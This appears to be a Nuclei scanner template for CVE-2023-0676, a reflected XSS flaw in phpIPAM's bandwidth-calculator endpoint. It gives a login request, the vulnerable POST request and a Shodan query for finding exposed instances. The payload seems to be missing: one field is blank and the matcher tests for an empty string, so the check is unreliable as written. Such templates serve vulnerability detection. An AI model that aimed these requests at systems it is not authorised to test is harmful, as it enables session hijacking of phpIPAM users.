id: CVE-2023-0676 info: name: phpIPAM 1.5.1 - Cross-site Scripting author: ritikchaddha severity: medium description: | Cross-site Scripting (XSS) - Reflected in GitHub repository phpipam/phpipam prior to 1.5.1. impact: | Allows attackers to execute malicious scripts in the context of a user's browser session. remediation: | Update phpipam/phpipam to the latest version to patch the vulnerability. reference: - https://huntr.dev/bounties/b72d4f0c-8a96-4b40-a031-7d469c6ab93b - https://nvd.nist.gov/vuln/detail/CVE-2023-0676 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-0676 cwe-id: CWE-79 epss-score: 0.00059 epss-percentile: 0.24112 cpe: cpe:2.3:a:phpipam:phpipam:*:*:*:*:*:*:*:* metadata: vendor: phpipam product: phpipam shodan-query: html:"phpIPAM IP address management" tags: cve,cve2023,phpipam,xss,authenticated http: - raw: - | POST /app/login/login_check.php HTTP/2 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded ipamusername={{username}}&ipampassword={{password}} - | POST /app/tools/ip-calculator/bw-calculator-result.php HTTP/2 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: {{BaseURL}}/phpipam/index.php?page=tools§ion=ip-calculator&subnetId=bw-calculator wsize=50000&delay=&fsize=1024 matchers: - type: dsl dsl: - contains(body_1, "Login successful") - contains(body_2, "") - contains(content_type_2, "text/html") - status_code_2 == 200 condition: and # digest: 490a0046304402202e7cbe2e8c82689ec34acc0be8577ec765aaa10990d9ec3fef283492a6842e01022050eb4325135554fb306a9d27835c7c5486da9e6e5a0e90fdda842bd385c6643d:922c64590222798bb761d5b6d8e72950